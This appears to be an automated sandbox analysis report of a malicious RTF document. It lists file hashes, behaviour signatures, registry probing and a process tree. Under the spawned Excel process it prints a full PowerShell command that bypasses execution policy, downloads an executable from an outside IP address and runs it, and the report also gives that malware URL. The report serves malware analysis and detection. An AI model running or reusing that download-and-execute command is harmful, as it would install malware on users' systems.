Analysis
- max time kernel: 138s
- max time network: 141s
- platform: windows10_x64
- resource: win10v200430
- submitted: 30-06-2020 04:40

Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
  Resource: win7
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
  Resource: win10v200430
General
- Target: SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf
- Size: 97KB
- MD5: 340e15c9ee5ae17758bb2e4a7890c0c0
- SHA1: 7bd2df48ad16fe08db23700ab57e781048f9bc76
- SHA256: 894bd85e8489f2ceeb14a9cd0c0b028d9749db622ad3bc68ccfc33323a92bd17
- SHA512: b93846e9dffea0449e4a1f441aa4956da9220c41d2564838e0ac95c4a0a6878dfdf0163087a42834e2edd59751c9097e3bd0834d06405060db3a1ab68a33ada6
Malware Config
- Extracted URL: http://185.208.211.67/scorp/Class.sfx.exe
Signatures
- Suspicious use of SetWindowsHookEx (13 IoCs)
  Processes: WINWORD.EXE, EXCEL.EXE, excelcnv.exe
  pid | process
  1508 | WINWORD.EXE (8 IoCs)
  3988 | EXCEL.EXE (4 IoCs)
  1112 | excelcnv.exe (1 IoC)
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes: EXCEL.EXE
  description | pid | process | target process
  PID 3988 wrote to memory of 1672 | 3988 | EXCEL.EXE | powershell.exe (2 IoCs)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 1672 | powershell.exe
- Checks processor information in registry (2 TTPs, 9 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: excelcnv.exe, WINWORD.EXE, EXCEL.EXE
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | excelcnv.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | excelcnv.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | excelcnv.exe
- Enumerates system info in registry (2 TTPs, 9 IoCs)
  Processes: EXCEL.EXE, excelcnv.exe, WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | excelcnv.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | excelcnv.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | excelcnv.exe
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  1508 | WINWORD.EXE (2 IoCs)
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1672 | 3988 | powershell.exe | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe
  pid | process
  1672 | powershell.exe (3 IoCs)
- Suspicious use of FindShellTrayWindow (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  1508 | WINWORD.EXE (2 IoCs)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | process
  18 | 1672 | powershell.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (pid 1508, tree level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.VBA.SCrypted.1.Gen.8935.3891.rtf" /o ""
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
- C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (pid 3988, tree level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Checks processor information in registry
  - Enumerates system info in registry
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 1672, tree level 2, child of EXCEL.EXE)
    Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/scorp/Class.sfx.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')
    - Suspicious use of AdjustPrivilegeToken
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
- C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe (pid 1112, tree level 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\excelcnv.exe" -Embedding
  - Suspicious use of SetWindowsHookEx
  - Checks processor information in registry
  - Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4
- C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1ACB2710-4DF2-4E17-85A7-B0AE2673A7D9
- C:\Users\Admin\AppData\Local\Temp\.ses
- memory/1672-3-0x0000000000000000-mapping.dmp
- memory/3988-0-0x000001890D4A2000-0x000001890D508000-memory.dmp (Filesize: 408KB)